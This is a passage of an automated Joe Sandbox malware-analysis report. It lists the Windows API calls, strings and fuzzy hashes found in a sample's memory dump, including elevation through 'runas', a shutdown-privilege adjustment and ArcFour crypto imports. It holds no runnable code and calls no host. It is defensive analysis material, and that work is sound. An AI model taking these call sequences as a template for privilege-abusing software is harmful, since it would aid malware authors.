                                                          • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                          • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                          • API String ID: 883996979-2356621170
                                                          • Opcode ID: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                          • Instruction ID: f917ad2a0ddd76f9e2927b7da1bf40d86712eb5f256f3455e7a65403f61927fd
                                                          • Opcode Fuzzy Hash: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                          • Instruction Fuzzy Hash: 6A317670A40648AFDB10EFA6C845ADE76B8EB09318F91847FF518E7281DB7C4909CB59
                                                          APIs
                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MessageSendShowWindow
                                                          • String ID:
                                                          • API String ID: 1631623395-0
                                                          • Opcode ID: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                          • Instruction ID: 1945ea129714beb182378817fb96d2750a9cf3de1b1d00e1964b2da952e4e1c4
                                                          • Opcode Fuzzy Hash: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                          • Instruction Fuzzy Hash: 54917071B04254BFDB10DFA9DA86F9E77F4AB04304F5501BAF904AB292C778AE40DB58
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 0041838B
                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                          • GetWindowRect.USER32(?), ref: 004183C4
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                          • ScreenToClient.USER32(00000000), ref: 004183F0
                                                          • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                          • String ID: ,
                                                          • API String ID: 2266315723-3772416878
                                                          • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                          • Instruction ID: e201a0486811adc056edcb3d82b1b2fee19cba914b7849b2462e59dde51cd5f3
                                                          • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                          • Instruction Fuzzy Hash: A3112BB1505201ABEB00DF69C885F9B77E8AF48314F15067EFD58DB296D738D900CBA9
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 107509674-3733053543
                                                          • Opcode ID: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                          • Instruction ID: a3beb9442be635481dc24a528bf80296f5a6403aa298a4e6fe1161b8e304ba10
                                                          • Opcode Fuzzy Hash: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                          • Instruction Fuzzy Hash: 46F09C70294B46B5E610A6758C17F3B71889B44759F94483AFE05EE1C3EBBCD90C4A3E
                                                          APIs
                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CryptVersion
                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                          • API String ID: 1951258720-508647305
                                                          • Opcode ID: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                          • Instruction ID: aa10fef992bac70bb4986ae7772dd6d371a0f40a2d4a4027d6f3d37c18d15e1e
                                                          • Opcode Fuzzy Hash: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                          • Instruction Fuzzy Hash: A1F0F9B0940700DBE728EFB6ACC67267795EBE570AF54813BA409911A2D7784499CB1C
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                          • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                          • String ID: isRS-$isRS-???.tmp
                                                          • API String ID: 134685335-3422211394
                                                          • Opcode ID: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                          • Instruction ID: ac0d863a46ff1cebd9ad17e119327f8a53363d7c8f83829e6742a95b9ddb5555
                                                          • Opcode Fuzzy Hash: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                          • Instruction Fuzzy Hash: 61317471914608ABCF10EF65CC41ADEBBBCDB45714F5184FBA908E32A1DB389E458F58
                                                          APIs
                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                          • SetForegroundWindow.USER32(?), ref: 00457469
                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                          Strings
                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                          • API String ID: 2236967946-3182603685
                                                          • Opcode ID: cf3dd7661c3a2792e8ad76a02533a59f2a31b040d492fcb55b696cf145d9940a
                                                          • Instruction ID: ea769b4c14fff8c8931e63d970561434c834200915b3ece1ca1c477b8b524b3f
                                                          • Opcode Fuzzy Hash: cf3dd7661c3a2792e8ad76a02533a59f2a31b040d492fcb55b696cf145d9940a
                                                          • Instruction Fuzzy Hash: A591E234608204EFD715CF55E9A1F5ABBF9FB49704F2180BAE80497792C638AE05DF58
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                          • API String ID: 1646373207-3712701948
                                                          • Opcode ID: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                          • Instruction ID: 94d637f012244594286cd058a6e690650624bbac00cb131118490790a059a9ff
                                                          • Opcode Fuzzy Hash: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                          • Instruction Fuzzy Hash: F6416271A04649ABCF01EFA5C892DEEB7B8EF48304F504566E800F7292D6785E09CB68
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00417D07
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Placement$Iconic
                                                          • String ID: ,
                                                          • API String ID: 568898626-3772416878
                                                          • Opcode ID: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                          • Instruction ID: 4a262c2e3c05075ab76cb34d6dc8316acc681754e7f1d5d7fcc9d539da6ecccc
                                                          • Opcode Fuzzy Hash: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                          • Instruction Fuzzy Hash: A9213E716002089BDF10EFA9D8C0ADA77B8AF58314F15416AFE19DF246D638ED44CBA8
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                          • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                          • String ID:
                                                          • API String ID: 4011626565-0
                                                          • Opcode ID: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                          • Instruction ID: 72b898f2585741bb0186620e4596b31eb4d76daf54761f31677757d41602065f
                                                          • Opcode Fuzzy Hash: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                          • Instruction Fuzzy Hash: E941B971A00A54AFCB10EF65CC55ADEB7B8EB88705F4044BAF404B7381E67C9F488E19
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                          • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                          • String ID:
                                                          • API String ID: 4011626565-0
                                                          • Opcode ID: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                          • Instruction ID: c50a8f924641f435bcadfb0116f3895028b18db14577d5a571763064cbfe8c6c
                                                          • Opcode Fuzzy Hash: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                          • Instruction Fuzzy Hash: 77417674A00A18DFCB11EFA5CD859DEB7B8FB88315F4044AAF804A7341E7789E858E59
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 1177325624-0
                                                          • Opcode ID: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                          • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                          • Opcode Fuzzy Hash: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                          • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00482F36
                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$IconicLong
                                                          • String ID:
                                                          • API String ID: 2754861897-0
                                                          • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                          • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                          • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                          • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                          • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                          • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                          • Opcode Fuzzy Hash: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                          • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 004241DC
                                                          • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                            • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,022125AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                          • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveFocusIconicShow
                                                          • String ID:
                                                          • API String ID: 649377781-0
                                                          • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                          • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
                                                          • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                          • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00417D07
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
